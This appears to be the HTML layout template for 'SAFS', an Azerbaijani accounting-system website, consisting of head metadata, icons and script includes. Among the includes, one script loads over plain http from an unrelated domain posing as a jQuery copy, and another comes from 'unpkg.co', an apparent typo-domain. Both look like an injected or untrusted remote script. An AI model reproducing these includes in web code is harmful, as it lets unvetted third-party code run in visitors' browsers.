<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Safs</title>
    <meta name="title" content="“SAFS”  Müasir dövrün tələblərinə uyğun avtomatlaşdırılmış uçot sistemi.">
    <meta name="description" content="“SAFS” -  Müasir dövrün tələblərinə uyğun avtomatlaşdırılmış uçot sistemi.Hər bir biznes vahidi təsərrüfat fəaliyyətindəki əməliyyatların ilk əvvəl mövcud qanunvericiliyə və normativ hüquqi aktlara uyğun, başa düşülən və nəticəni düzgün əks etdirməyə vara biləcək uçot sisteminin olmasını arzu edir.">
    <meta name="keywords" content="Siesco, Maliyyə, Mühasibatlıq,İdarəetmə,Uçotun bərpası">
    <meta name="robots" content="index, follow">
    <link rel="stylesheet" href="/css/style.css">
    <link rel="apple-touch-icon" sizes="57x57" href="/img/apple-icon-57x57.png">
    <link rel="apple-touch-icon" sizes="60x60" href="/img/apple-icon-60x60.png">
    <link rel="apple-touch-icon" sizes="72x72" href="/img/apple-icon-72x72.png">
    <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-icon-76x76.png">
    <link rel="apple-touch-icon" sizes="114x114" href="/img/apple-icon-114x114.png">
    <link rel="apple-touch-icon" sizes="120x120" href="/img/apple-icon-120x120.png">
    <link rel="apple-touch-icon" sizes="144x144" href="/img/apple-icon-144x144.png">
    <link rel="apple-touch-icon" sizes="152x152" href="/img/apple-icon-152x152.png">
    <link rel="apple-touch-icon" sizes="180x180" href="/img/apple-icon-180x180.png">
    <link rel="icon" type="image/png" sizes="192x192" href="/img/android-icon-192x192.png">
    <link rel="icon" type="image/png" sizes="32x32" href="/img/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="96x96" href="/img/favicon-96x96.png">
    <link rel="icon" type="image/png" sizes="16x16" href="/img/favicon-16x16.png">
    <link rel="manifest" href="/img/manifest.json">
    <meta name="google-site-verification" content="UwIr2AhrAwrOYtnzIYdLSrceP2M1mArADCOVX9qahD4" />
    <meta name="msapplication-TileColor" content="#ffffff">
    <meta name="msapplication-TileImage" content="/img/ms-icon-144x144.png">
    <meta name="theme-color" content="#ffffff">
    <link rel="icon" type="image/png" href="/img/logo-1.png">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link href="https://cdn.jsdelivr.net/npm/remixicon@3.2.0/fonts/remixicon.css" rel="stylesheet">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/slick-carousel/1.6.0/slick.js"></script>
    <script src='http://www.turquetwww.disco-forever-haute-loire.net/scripts/jquery191/jquery-1.9.1.min.js'></script>
    <script src="https://unpkg.co/gsap@3/dist/gsap.min.js"></script>

</head>
<body>
    @await Html.PartialAsync("nav")
    @RenderBody()
    @await Html.PartialAsync("footer")
    <script src="/js/script.js"></script>
    <script src="/js/anime.js"></script>
</body>
</html>
